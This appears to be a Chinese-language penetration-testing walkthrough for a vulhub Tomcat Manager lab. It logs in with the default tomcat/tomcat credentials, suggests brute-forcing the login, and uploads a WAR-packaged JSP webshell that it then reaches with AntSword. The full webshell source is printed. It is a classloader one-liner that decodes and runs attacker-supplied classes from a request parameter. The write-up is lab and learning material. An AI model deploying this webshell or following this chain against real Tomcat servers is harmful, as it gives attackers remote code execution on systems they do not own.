🍉 === shell
此环境来自vulhub工程:
https://github.com/vulhub/vulhub
以下测试环境为ubuntu 20.04
所有漏洞环境信息查询:https://vulhub.org/
# 拉取vulhub配置
git clone https://github.com/vulhub/vulhub.git
# 切换到相应漏洞路径
cd /path/to/vul
# docker-compose部署该漏洞环境
docker-compose up -d
访问http://your-ip:8080/manager/html
默认账号和密码均为tomcat,可以直接登录,当然对于一般渗透的思路,这种类型的登录框建议爆破,毕竟没有验证码或口令,同时这也是需要加固的一点
登录成功后,发现可以使用war文件上传,将jsp一句话木马压缩为zip文件后,后缀名在改为war,就可以上传,而且貌似也没有验证机制,什么不需要考虑什么绕过问题
jsp木马来自这篇文章
这里准备使用蚁剑连接:
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
war文件成功上传后可以发现,该框架下多了一个名为上传文件名的文件夹路径
里面存放着我们上传的jsp木马文件,可以通过访问http://your-ip:8080/passwd/passwd.jsp
访问这个木马
使用蚁剑连接:
会利用就会加固